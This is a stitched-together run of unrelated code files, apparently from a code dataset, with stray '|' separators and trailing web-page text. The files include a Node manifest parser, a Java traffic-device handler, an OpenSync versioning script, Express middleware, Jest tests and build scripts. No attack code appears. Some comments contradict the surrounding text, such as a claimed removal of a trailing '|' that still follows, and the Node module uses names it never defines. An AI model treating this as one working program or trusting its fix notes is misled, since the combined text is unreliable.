var utils = require('./utils')
// Defaults used when no manifest.json exists next to the entry file.
var DEFAULT_COLOR = Buffer.from('#fff')
var DEFAULT_DESCRIPTION = Buffer.from('')
var DEFAULT_MANIFEST = Buffer.from(JSON.stringify({
  name: '',
  short_name: '',
  start_url: '/',
  display: 'minimal-ui',
  background_color: '#fff',
  theme_color: '#fff'
}))
// Candidate filenames looked for in the entry file's directory.
var filenames = [
  'manifest.json'
]
module.exports = node
// Parses the manifest once; in watch mode also re-parses whenever
// manifest.json changes in the entry directory.
function node (state, createEdge, emit) {
  var basedir = utils.dirname(state.metadata.entry)
  var self = this
  // Install the watcher at most once per process (flag lives on shared
  // metadata) and tear it down when this node closes.
  if (state.metadata.watch && !state.metadata.watchers.manifest) {
    state.metadata.watchers.manifest = true
    debug('watching ' + basedir + ' for ' + filenames.join(', '))
    var unwatch = utils.watch(basedir, filenames, parse)
    this.on('close', function () {
      debug('closing file watcher')
      unwatch()
    })
  }
  parse()
  function parse () {
    debug('parsing')
    utils.find(basedir, filenames, function (err, filename) {
      if (err) {
        // No manifest found: emit the defaults rather than failing the build.
        createEdge('color', DEFAULT_COLOR)
        createEdge('description', DEFAULT_DESCRIPTION)
        createEdge('bundle', DEFAULT_MANIFEST)
        return
      }
      fs.readFile(filename, function (err, file) {
        if (err) return self.emit('error', 'manifest', 'fs.readfile', err)
        var res = parseJson(file)
        if (res.err) return self.emit('error', 'manifest', 'JSON.parse', res.err)
        debug('creating edges')
        // Missing optional fields fall back to the same defaults as above.
        createEdge('description', Buffer.from(res.value.description || ''))
        createEdge('color', Buffer.from(res.value.theme_color || '#fff'))
        createEdge('bundle', Buffer.from(JSON.stringify(res.value)))
      })
    })
  }
}
|
#!/bin/bash
# Build the application image, tagged with the Buildkite build number.
set -eu
# Quote the tag so an APPNAME containing spaces cannot split into extra args.
docker build . -t "$APPNAME:$BUILDKITE_BUILD_NUMBER"
|
/**
 * Reports whether `str` reads the same forwards and backwards.
 * Comparison is over UTF-16 code units (same as String indexing), exact and
 * case-sensitive — no normalization is applied.
 *
 * @param {string} str - Input string.
 * @returns {boolean} True when `str` is a palindrome (including '' and 1-char strings).
 */
function isPalindrome(str) {
  let lo = 0;
  let hi = str.length - 1;
  while (lo < hi) {
    if (str.charAt(lo) !== str.charAt(hi)) {
      return false;
    }
    lo += 1;
    hi -= 1;
  }
  return true;
}
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package org.fhwa.c2cri.tmdd.emulation.generic;
import java.util.ArrayList;
import org.fhwa.c2cri.centermodel.emulation.exceptions.EntityEmulationException;
import org.fhwa.c2cri.infolayer.MessageSpecification;
import org.fhwa.c2cri.tmdd.TMDDAuthenticationProcessor;
import org.fhwa.c2cri.tmdd.TMDDErrorResponseProcessor;
import org.fhwa.c2cri.tmdd.emulation.TMDDEntityType;
import org.fhwa.c2cri.tmdd.emulation.TMDDMessageProcessor;
import org.fhwa.c2cri.tmdd.emulation.TMDDNRTMSelections;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityCommandProcessor;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityCommandQueue;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityControlRequestStatus;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityControlRequestStatusCollector;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityControlRequestStatusRecord;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityDataOrganizationInformationCollector;
import org.fhwa.c2cri.tmdd.emulation.entitydata.EntityEmulationRequests;
import org.fhwa.c2cri.tmdd.emulation.exceptions.InvalidCommandException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.InvalidEntityControlRequestLogException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.InvalidEntityControlRequestStatusException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.MessageAuthenticationException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.NRTMViolationException;
import org.fhwa.c2cri.tmdd.emulation.exceptions.NoMatchingDataException;
import org.fhwa.c2cri.tmdd.emulation.generic.dialogs.DlDeviceCancelControlRequest;
import org.fhwa.c2cri.tmdd.emulation.generic.dialogs.DlDeviceControlStatusRequest;
import org.fhwa.c2cri.tmdd.errorcodes.TMDDMissingInformationError;
/**
 * Request/response handler for TMDD device dialogs that are not tied to a
 * specific device type (the "generic" entity). Routes
 * dlDeviceCancelControlRequest and dlDeviceControlStatusRequest messages to
 * the matching dialog processors, and acts as the status-collector /
 * command-processor callback those dialogs invoke.
 *
 * @author TransCore ITS, LLC Created: Feb 15, 2016
 */
public class GenericDeviceHandler implements EntityControlRequestStatusCollector, EntityCommandProcessor {
    // Supplies organization information when building control response messages.
    private EntityDataOrganizationInformationCollector orgInfoDataCollector;
    public void initialize() throws EntityEmulationException {
    }
    // Hidden: a handler is only meaningful with an organization-info collector.
    private GenericDeviceHandler() {
    }
    ;
    public GenericDeviceHandler(EntityDataOrganizationInformationCollector orgInfoCollector) {
        this.orgInfoDataCollector = orgInfoCollector;
    }
    /**
     * Dispatches one request/response dialog and returns the response message.
     * Supported dialogs: dlDeviceCancelControlRequest and
     * dlDeviceControlStatusRequest; anything else yields an errorReportMsg.
     * For both dialogs the device-id / request-id / organization-id triple is
     * required; the entity type is looked up from the command queue and falls
     * back to GENERIC when no match is found.
     */
    public MessageSpecification getRRResponse(String dialog, MessageSpecification requestMessage) {
        MessageSpecification responseMsg = null;
        // try {
        //
        // // Verify that the request message satisfies the project NRTM Settings
        // TMDDNRTMSelections.getInstance().verifyMessageNRTM(dialog, requestMessage, TMDDEntityType.EntityType.GENERIC);
        //
        // // Verify that the request message satisfies any project Authentication requirements.
        // TMDDAuthenticationProcessor.getInstance().processRequestMessageAuthentication(dialog, requestMessage, TMDDEntityType.EntityType.GENERIC);
        switch (dialog) {
            case "dlDeviceCancelControlRequest":
                String msgCancelDeviceID = (requestMessage.getElementValue("*." + "device-id"));
                String msgCancelRequestID = (requestMessage.getElementValue("*." + "request-id"));
                String msgCancelOrgID = (requestMessage.getElementValue("*." + "organization-requesting.organization-id"));
                // All three identifiers are mandatory for a cancel request.
                if ((msgCancelDeviceID != null) && !msgCancelDeviceID.isEmpty()&& (msgCancelRequestID != null) && !msgCancelRequestID.isEmpty() && (msgCancelOrgID != null) && !msgCancelOrgID.isEmpty()){
                    try {
                        // Figure out which Entity Type is associated with this device id.
                        TMDDEntityType.EntityType entityType = EntityCommandQueue.getInstance().getControlRequestEntityType(msgCancelOrgID, msgCancelDeviceID, msgCancelRequestID);
                        DlDeviceCancelControlRequest controlCancelDialogProcessor = new DlDeviceCancelControlRequest();
                        responseMsg = controlCancelDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECANCELCONTROLREQUESTMSG, entityType, null, null, this);
                    } catch (Exception ex){ // Error finding a matching entityType. Just use Generic ...
                        DlDeviceCancelControlRequest controlCancelDialogProcessor = new DlDeviceCancelControlRequest();
                        responseMsg = controlCancelDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECANCELCONTROLREQUESTMSG, TMDDEntityType.EntityType.GENERIC, null, null, this);
                    }
                } else {
                    TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
                    responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", "The message received did not contain correct device-id, request-id or organization-id values for the dlCancelControlRequest dialog.");
                }
                break;
            // responseMsg = TMDDMessageProcessor.processDeviceCancelControlRequestMsg(requestMessage, this);
            // break;
            case "dlDeviceControlStatusRequest":
                String msgDeviceID = (requestMessage.getElementValue("*." + "device-id"));
                String msgRequestID = (requestMessage.getElementValue("*." + "request-id"));
                String msgOrgID = (requestMessage.getElementValue("*." + "organization-requesting.organization-id"));
                // Same mandatory-identifier check as the cancel dialog above.
                if ((msgDeviceID != null) && !msgDeviceID.isEmpty()&& (msgRequestID != null) && !msgRequestID.isEmpty() && (msgOrgID != null) && !msgOrgID.isEmpty()){
                    try {
                        // Figure out which Entity Type is associated with this device id.
                        TMDDEntityType.EntityType entityType = EntityCommandQueue.getInstance().getControlRequestEntityType(msgOrgID, msgDeviceID, msgRequestID);
                        DlDeviceControlStatusRequest controlStatusDialogProcessor = new DlDeviceControlStatusRequest();
                        responseMsg = controlStatusDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECONTROLSTATUSREQUESTMSG, entityType, null, null, this);
                    } catch (Exception ex){ // Error finding a matching entityType. Just use Generic ...
                        DlDeviceControlStatusRequest controlStatusDialogProcessor = new DlDeviceControlStatusRequest();
                        responseMsg = controlStatusDialogProcessor.handle(requestMessage, EntityEmulationRequests.EntityRequestMessageType.DEVICECONTROLSTATUSREQUESTMSG, TMDDEntityType.EntityType.GENERIC, null, null, this);
                    }
                } else {
                    TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
                    responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", "The message received did not contain correct device-id, request-id or organization-id values for the dlControlStatusRequest dialog.");
                }
                break;
            // responseMsg = TMDDMessageProcessor.processDeviceControlStatusRequestMsg(requestMessage, this);
            // break;
            default:
                TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
                responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "other", "Dialog " + dialog + " is not currently supported by the CCTVHandler.");
                break;
        }
        // } catch (NRTMViolationException ex) {
        // TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
        // responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", ex.getMessage());
        // } catch (MessageAuthenticationException ex) {
        // TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
        // responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "authentication not recognized", ex.getMessage());
        // } catch (NoMatchingDataException ex) {
        // TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
        // responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "no valid data available", ex.getMessage());
        // } catch (EntityEmulationException ex) {
        // TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
        // responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "other", ex.getMessage());
        // }
        //
        // try {
        // TMDDNRTMSelections.getInstance().verifyMessageNRTM(dialog, responseMsg, TMDDEntityType.EntityType.GENERIC);
        // } catch (NRTMViolationException ex) {
        // TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
        // responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "missing information prevents processing message", ex.getMessage());
        // } catch (EntityEmulationException ex) {
        // TMDDErrorResponseProcessor errorProcessor = new TMDDErrorResponseProcessor();
        // responseMsg = errorProcessor.getErrorResponseMsgSpec("errorReportMsg", "other", ex.getMessage());
        // }
        return responseMsg;
    }
    /** Delegates status lookup to the shared EntityControlRequestStatus store. */
    @Override
    public EntityControlRequestStatusRecord getControlRequestStatus(String orgId, String entityId, String requestId) throws EntityEmulationException {
        return EntityControlRequestStatus.getControlRequestStatus(orgId, entityId, requestId);
    }
    /** Persists an updated status record (third argument true per the store's API). */
    @Override
    public void updateControlRequestStatus(EntityControlRequestStatusRecord statusRecord, MessageSpecification requestMsg) throws EntityEmulationException {
        EntityControlRequestStatus.updateControlRequestStatus(statusRecord, requestMsg, true);
    }
    @Override
    public void verifyCommand(MessageSpecification commandMessage) throws InvalidCommandException, EntityEmulationException {
        throw new UnsupportedOperationException("Not supported yet."); //To change body of generated methods, choose Tools | Templates.
    }
    /**
     * Cancels a queued control request: marks it "other", clears the lock and
     * re-stamps the record.
     *
     * NOTE(review): the guard tests for "tmdd:deviceControlStatusRequestMsg"
     * but the element paths below read deviceCancelControlRequestMsg fields —
     * confirm which message type this branch is actually meant to handle.
     */
    @Override
    public void executeCommand(MessageSpecification commandMessage) throws EntityEmulationException {
        if (commandMessage.containsMessageOfType("tmdd:deviceControlStatusRequestMsg")) {
            // get the org Id from the message
            String orgId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.organization-requesting.organization-id");
            // get the entity ID from the message
            String entityId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.device-id");
            // get the request ID from the message
            String requestId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.request-id");
            // get the matching control Request Status record
            EntityControlRequestStatusRecord statusRecord = EntityCommandQueue.getInstance().getControlRequestStatus(orgId, entityId, requestId);
            // If there is no queued control request matching the cancel request throw an exception.
            // Only requests still in the queued state ("3" or its text form) may be cancelled.
            if (!statusRecord.getStatus().equals("3") && !statusRecord.getStatus().equals("request queued/not implemented")) {
                throw new NoMatchingDataException("No matching control requests are currently queued.");
            }
            statusRecord.setStatus("other");
            statusRecord.setLockStatus(0);
            statusRecord.updateDate();
            EntityCommandQueue.getInstance().updateControlRequestStatus(statusRecord, commandMessage, true);
        }
    }
    @Override
    public void queueCommand(MessageSpecification commandMessage) throws InvalidEntityControlRequestStatusException, InvalidEntityControlRequestLogException, EntityEmulationException {
        throw new UnsupportedOperationException("Not supported yet."); //To change body of generated methods, choose Tools | Templates.
    }
    /**
     * Builds the control response for either a status request or a cancel
     * request: extracts the (org, entity, request) triple from whichever
     * message type is present, looks up the status record, and strips the
     * organization-information-forwarding-restrictions element from the
     * generated response.
     */
    @Override
    public MessageSpecification getControlResponseMessage(MessageSpecification commandMessage) throws InvalidEntityControlRequestStatusException, EntityEmulationException {
        // get the org Id from the message
        String orgId = "";
        // get the entity ID from the message
        String entityId = "";
        // get the request ID from the message
        String requestId = "";
        if (commandMessage.containsMessageOfType("tmdd:deviceControlStatusRequestMsg")) {
            // get the org Id from the message
            orgId = commandMessage.getElementValue("tmdd:deviceControlStatusRequestMsg.organization-requesting.organization-id");
            // get the entity ID from the message
            entityId = commandMessage.getElementValue("tmdd:deviceControlStatusRequestMsg.device-id");
            // get the request ID from the message
            requestId = commandMessage.getElementValue("tmdd:deviceControlStatusRequestMsg.request-id");
        } else {
            // get the org Id from the message
            orgId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.organization-requesting.organization-id");
            // get the entity ID from the message
            entityId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.device-id");
            // get the request ID from the message
            requestId = commandMessage.getElementValue("tmdd:deviceCancelControlRequestMsg.request-id");
        }
        // get the matching control Request Status record
        EntityControlRequestStatusRecord statusRecord = EntityCommandQueue.getInstance().getControlRequestStatus(orgId, entityId, requestId);
        TMDDEntityType.EntityType entityType = TMDDEntityType.EntityType.valueOf(statusRecord.getEntityType());
        ArrayList<String> controlResponseList = new ArrayList();
        System.out.println("SectionHandler::getControlResponseMessage Is tmdd:deviceCancelControlRequestMsg");
        for (String thisElement : TMDDMessageProcessor.createControlResponseMessage(entityType, statusRecord, orgInfoDataCollector).getMessageSpec()) {
            // Add all elements that come from DeviceControlResponse unless it is organization-information-forwarding-restrictions
            if (!thisElement.contains("organization-information-forwarding-restrictions")) {
                controlResponseList.add(thisElement);
            }
        }
        return new MessageSpecification(controlResponseList);
    }
}
|
# Install the project's Python dependencies system-wide (requires root).
# BUG FIX: removed a stray trailing '|' that made the line a syntax error.
# NOTE(review): prefer a virtualenv over sudo-installing into system Python.
sudo pip3 install -r requirements.txt
public class Palindrome {
    /**
     * Returns whether {@code s} reads the same forwards and backwards.
     * Empty and single-character strings are palindromes.
     *
     * @param s the string to test (must be non-null)
     * @return true if s is a palindrome
     */
    public static boolean isPalindrome(String s) {
        // Compare mirrored pairs from both ends; only the first half needs
        // checking. (The original looped over the whole string, testing every
        // pair twice — same result, twice the work.)
        for (int i = 0, j = s.length() - 1; i < j; i++, j--) {
            if (s.charAt(i) != s.charAt(j)) {
                return false;
            }
        }
        return true;
    }

    /** Demo entry point: prints whether "racecar" is a palindrome. */
    public static void main(String[] args) {
        String s = "racecar";
        System.out.println(isPalindrome(s));
    }
}
package ru.job4j.profession;
/**
 * Profession template: read-only data holder for an employee's
 * profession-related attributes.
 *
 * NOTE(review): this class exposes only getters and never assigns its fields
 * (no constructor or setters are visible here), so every getter returns the
 * field's default value — confirm whether subclasses or reflection populate
 * them.
 *
 * @author <NAME> ( https://vk.com/id428714363)
 * @version 1.0
 * @since 13.06.19
 */
public class Profession {
    /** Length of service (work experience). */
    private double standing;
    /** Employee's first name. */
    private String name;
    /** Employee's surname. */
    private String surname;
    /** Employee's education. */
    private String education;
    /** Employee's salary. */
    private double salary;
    /** Employee's work schedule. */
    private String timetable;

    /** @return length of service */
    public double getStanding() {
        return standing;
    }

    /** @return first name */
    public String getName() {
        return name;
    }

    /** @return surname */
    public String getSurname() {
        return surname;
    }

    /** @return education */
    public String getEducation() {
        return education;
    }

    /** @return salary */
    public double getSalary() {
        return salary;
    }

    /** @return work schedule */
    public String getTimetable() {
        return timetable;
    }
}
|
# Copyright (c) 2015, Plume Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the Plume Design Inc. nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Plume Design Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
#
# version-lib.sh - provides version data for image creation
# (meant to be sourced)
#
#
# Interface of version.lib.sh
# ---------------------------
#
# input:
# CURDIR
# OPENSYNC_TARGET_VERSION_OVERRIDE
# VERSION_TARGET
# TARGET
# VENDOR_DIR
# VERSION_FILE
# BUILD_NUMBER
# IMAGE_DEPLOYMENT_PROFILE
# LAYER_LIST
# VER_DATE
# VERSION_APPEND
# VERSION_APPEND_END
#
# output:
# SHA1 (sha1 of git repository used to build)
# DIRTY_STRING (local modifications string)
# VERSION (target/product version)
# USERNAME (user used to build the image)
# HOSTNAME (hostname used to build the image)
# VER_DATE (date of image build)
# APP_VERSION (application version string)
# BUILD_NUMBER (consecutive build number)
# OSYNC_VERSION (OpenSync version - core/.version)
#
# Full version format:
# VERSION-BUILD_NUMBER-gSHA1-DIRTY_STRING-VERSION_APPEND-IMAGE_DEPLOYMENT_PROFILE-VERSION_APPEND_END
#
# Version number uses the first defined value from the below list:
# 1. env. var. $OPENSYNC_TARGET_VERSION_OVERRIDE
# 2. file $VENDOR_DIR/.version.$VERSION_TARGET
# 3. file $VENDOR_DIR/.version.$TARGET
# 4. file $VENDOR_DIR/.version
# 5. file core/.version
# Determine the directory of this script unless the caller preset CURDIR.
if [ -z "$CURDIR" ]; then
    CURDIR=$(dirname "$0")
fi
cd "${CURDIR}/../../../"

# SHA1: short (7-char) commit id prefixed with 'g', or "notgit" when not
# building from a git checkout. DIRTY: count of tracked files with local
# modifications (untracked '??' entries are ignored).
# (Modernized: POSIX `[ a ] || [ b ]` instead of the obsolescent `-o`
# operator, and `$()` instead of backticks.)
if [ -e .git ] || [ -e ../.git ]; then
    SHA1='g'$([ -e ../.git ] && cd ..; git log --pretty=oneline --abbrev-commit -1 | awk '{ print $1 }' | cut -b1-7)
    DIRTY=$([ -e ../.git ] && cd ..; git status --porcelain | grep -v -e '^??' | wc -l)
else
    echo "WARNING: version not in git" 1>&2
    SHA1="notgit"
    DIRTY=0
fi

# Per vendor/product versioning: pick the most specific version file that
# exists (priority list documented in the header above).
if [ -z "$VERSION_FILE" ]; then
    VERSION_FILE="$VENDOR_DIR/.version.$VERSION_TARGET"
    if [ ! -f "$VERSION_FILE" ]; then
        VERSION_FILE="$VENDOR_DIR/.version.$TARGET"
    fi
    if [ ! -f "$VERSION_FILE" ]; then
        VERSION_FILE="$VENDOR_DIR/.version"
    fi
    if [ ! -f "$VERSION_FILE" ]; then
        VERSION_FILE=".version"
    fi
fi

# An explicit override from the environment wins over any version file.
if [ -n "$OPENSYNC_TARGET_VERSION_OVERRIDE" ]; then
    VERSION="$OPENSYNC_TARGET_VERSION_OVERRIDE"
else
    # Quoted to avoid word splitting on paths containing whitespace.
    VERSION=$(cat "$VERSION_FILE")
fi

# OpenSync core version always comes from core/.version (we cd'd to root).
OSYNC_VERSION=$(cat .version)

DIRTY_STRING=""
if [ "${DIRTY}" -ne 0 ]; then
    DIRTY_STRING="-mods"
fi

USERNAME=$(id -n -u)
HOSTNAME=$(hostname)

if [ -z "$VER_DATE" ]; then
    VER_DATE=$(date)
fi

# First see if BUILD_NUMBER is defined in environment by Jenkins,
# then try to find it in a file, and if not found use 0.
if [ -z "${BUILD_NUMBER}" ]; then
    if [ -f "${CURDIR}/../../../.buildnum" ]; then
        BUILD_NUMBER=$(cat "${CURDIR}/../../../.buildnum")
    fi
fi
if [ -z "${BUILD_NUMBER}" ]; then
    BUILD_NUMBER="0"
fi

# Assemble APP_VERSION:
#   VERSION[-BUILD_NUMBER][-gSHA1][-mods][-VERSION_APPEND][-PROFILE][-VERSION_APPEND_END]
# Each optional part is suppressed by the corresponding VERSION_NO_* knob.
APP_VERSION="${VERSION}"
if [ "${VERSION_NO_BUILDNUM}" != "1" ]; then
    # append build number
    APP_VERSION="${APP_VERSION}-${BUILD_NUMBER}"
fi
if [ "${VERSION_NO_SHA1}" != "1" ]; then
    # append SHA1
    APP_VERSION="${APP_VERSION}-${SHA1}"
fi
if [ "${VERSION_NO_MODS}" != "1" ]; then
    # append dirty string
    APP_VERSION="${APP_VERSION}${DIRTY_STRING}"
fi
if [ -n "${VERSION_APPEND}" ]; then
    # append custom string before profile
    APP_VERSION="${APP_VERSION}-${VERSION_APPEND}"
fi
# Append deployment profile (defaults to "development"; "none" suppresses it).
if [ "${VERSION_NO_PROFILE}" != "1" ]; then
    if [ -z "${IMAGE_DEPLOYMENT_PROFILE}" ]; then
        IMAGE_DEPLOYMENT_PROFILE="development"
    fi
    # Profile is guaranteed non-empty at this point, so only "none" is checked
    # (the original's redundant -n test combined with obsolescent -a dropped).
    if [ "${IMAGE_DEPLOYMENT_PROFILE}" != "none" ]; then
        APP_VERSION="${APP_VERSION}-${IMAGE_DEPLOYMENT_PROFILE}"
    fi
fi
if [ -n "${VERSION_APPEND_END}" ]; then
    # append custom string after profile
    APP_VERSION="${APP_VERSION}-${VERSION_APPEND_END}"
fi

# Restore the caller's working directory (this file is meant to be sourced).
cd - >/dev/null
|
const Bookshelf = require('../models/bookshelfModel');
const UserShelfBook = require('../models/userShelfBookModel');
const UserBook = require('../models/userBooksModel');
/**
 * Express middleware validating a request to add a book to a bookshelf.
 *
 * Requires `shelfId` and `bookId` in the request body, verifies that the
 * bookshelf and the user's book both exist, and rejects the request if the
 * book is already on the shelf. Responds 400 with a descriptive error on any
 * validation failure, 500 on unexpected errors; calls next() on success.
 *
 * @param {object} req - Express request (reads req.body.shelfId / bookId)
 * @param {object} res - Express response
 * @param {Function} next - next middleware
 */
const createUserShelfBookRequirements = async (req, res, next) => {
  try {
    const { shelfId, bookId } = req.body;
    if (!shelfId)
      return res
        .status(400)
        .json({ status: 'Failure', error: 'shelfId field is required' });
    if (!bookId)
      return res
        .status(400)
        .json({ status: 'Failure', error: 'bookId field is required' });
    // The three lookups are independent of each other — run them in
    // parallel instead of awaiting them one at a time.
    const [bookshelf, userBook, userShelfBook] = await Promise.all([
      Bookshelf.findById(shelfId),
      UserBook.findById(bookId),
      UserShelfBook.findBookInBookshelf(shelfId, bookId),
    ]);
    if (!bookshelf)
      return res.status(400).json({
        status: 'Failure',
        error: 'Bookshelf with that id does not exist',
      });
    if (!userBook)
      return res.status(400).json({
        status: 'Failure',
        error: 'User does not have a book with that id',
      });
    if (userShelfBook)
      return res
        .status(400)
        .json({ status: 'Failure', error: 'Book already in bookshelf' });
    next();
  } catch (error) {
    // Use the error stream for failures (was console.log).
    console.error(error);
    return res.status(500).json({ status: 'Failure', error: 'Server failure' });
  }
};
module.exports = createUserShelfBookRequirements;
|
<reponame>jeanboydev/Android-PermissionMaster<filename>component_permission/src/main/java/com/jeanboy/component/permission/core/Ranger.java
package com.jeanboy.component.permission.core;
import android.content.Context;
/**
 * A single permission-handling step in the permission framework.
 *
 * NOTE(review): method names suggest {@code isGranted} reports whether the
 * guarded permission/condition is satisfied and {@code onAction} performs the
 * corresponding request or redirect — confirm against the implementations
 * elsewhere in this module.
 *
 * @author caojianbo
 * @since 2019/12/26 15:03
 */
public interface Ranger {
    /**
     * @param context Android context used for the check
     * @return whether this Ranger's condition is satisfied (presumably the
     *         permission is granted — TODO confirm)
     */
    boolean isGranted(Context context);

    /**
     * Performs this Ranger's action (presumably requesting the permission or
     * opening the relevant settings screen — TODO confirm).
     *
     * @param context Android context used to perform the action
     */
    void onAction(Context context);
}
|
import moment from 'moment';
/**
 * A date-range filter for log queries. beginAt/endAt are thunks so the range
 * is evaluated at query time, not at module load.
 */
export interface LogDateFilter {
  beginAt: Function;
  endAt: Function;
  text: string;
}

/**
 * Default filter: the last 15 minutes.
 *
 * BUG FIX: beginAt and endAt were swapped — beginAt returned "now" and endAt
 * returned "now − 15 minutes", producing an inverted (empty) range for the
 * advertised "Last 15 minutes".
 */
export const defaultLogDateFilter: LogDateFilter = {
  text: 'Last 15 minutes',
  beginAt: () => moment().subtract(15, "minutes").toDate(),
  endAt: () => moment().toDate()
};
|
<filename>webpack/src/common/utils/fp.test.js
// Unit tests for the functional helpers in ./fp.
import * as fp from './fp'

// NOTE(review): `R` (used in the last test) is never imported in this file —
// presumably Ramda. Add `import * as R from 'ramda'` or these tests throw a
// ReferenceError; confirm whether R reaches scope via a jest setup file.

// arrayToggle(item, list): per the assertions below, removes `item` if
// present, inserts it if absent; when `item` is itself an array, each of its
// elements is toggled individually.
test('toggle list item', () => {
  expect(fp.arrayToggle('a', ['a', 'b', 'c'])).toEqual(['b', 'c'])
  expect(fp.arrayToggle('c', ['a', 'b'])).toEqual(['a', 'b', 'c'])
  expect(fp.arrayToggle(1, [1])).toEqual([])
  expect(fp.arrayToggle('a', [])).toEqual(['a'])
  expect(fp.arrayToggle(1, [1])).toEqual([])
  expect(fp.arrayToggle(1, [2])).toEqual([1, 2])
  expect(fp.arrayToggle([1, 2], [1, 2, 4])).toEqual([4])
  expect(fp.arrayToggle([1, 2], [3, 4])).toEqual([1, 2, 3, 4])
  expect(fp.arrayToggle([1, 2, 3], [3, 4])).toEqual([1, 2, 4])
})

// objectToggle(key, value): returns a curried toggle — deletes `key` when it
// already maps to `value`, otherwise sets it to `value`.
test('toggle object item', () => {
  const toggle = fp.objectToggle('a', 1)
  expect(toggle({ a: 1, b: 2 })).toEqual({ b: 2 })
  expect(toggle({ a: 2, b: 1 })).toEqual({ a: 1, b: 1 })
  expect(toggle({ b: 1 })).toEqual({ a: 1, b: 1 })
})

// combinedToggle: behaves like objectToggle for plain values, but toggles
// element-wise (arrayToggle-style) when the existing value is an array.
test('toggle combined item', () => {
  const toggle = fp.combinedToggle('a', 1)
  expect(toggle({ a: 1, b: 2 })).toEqual({ b: 2 })
  expect(toggle({ a: 2, b: 1 })).toEqual({ a: 1, b: 1 })
  expect(toggle({ b: 1 })).toEqual({ a: 1, b: 1 })
  expect(toggle({ a: [1] })).toEqual({ a: [] })
  expect(toggle({ a: [2] })).toEqual({ a: [1, 2] })
})

// without removes an element; union prepends it only when absent.
test('without and union', () => {
  expect(fp.without(1, [1, 2, 3])).toEqual([2, 3])
  expect(fp.union(1, [1, 2, 3])).toEqual([1, 2, 3])
  expect(fp.union(1, [2, 3])).toEqual([1, 2, 3])
})

// partialMap(spec, args): partially applies `args` to every function in
// `spec`. The last assertion implies that when enough arguments are supplied,
// the value is fully applied (`.c` is 300, not a function).
test('partial apply of curried functions', () => {
  const spec = {
    a: (a, b) => a + b,
    b: R.curry((a, b) => a + b),
    c: R.uncurryN(2, a => b => a + b),
  }
  expect(fp.partialMap(spec, 100).a(1)).toBe(101)
  expect(fp.partialMap(spec, [1]).b(4)).toBe(5)
  expect(fp.partialMap(spec, [100, 200]).c).toBe(300)
})
|
#!/usr/bin/env bash
# Build the demo: compile the webapp's TypeScript project, then bundle the
# compiled entry point into the demo server's public lib directory.
# BUG FIX: removed a stray trailing '|' on the webpack line (dangling pipe
# is a shell syntax error).
tsc --project demo/webapp
# NOTE(review): the positional "<entry> <output>" form is the webpack <= v3
# CLI; newer webpack needs --entry/--output-path — confirm project's version.
./node_modules/.bin/webpack demo/webapp/lib/demo/webapp/webapp.js demo/server/public/lib/reactdemo.js
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.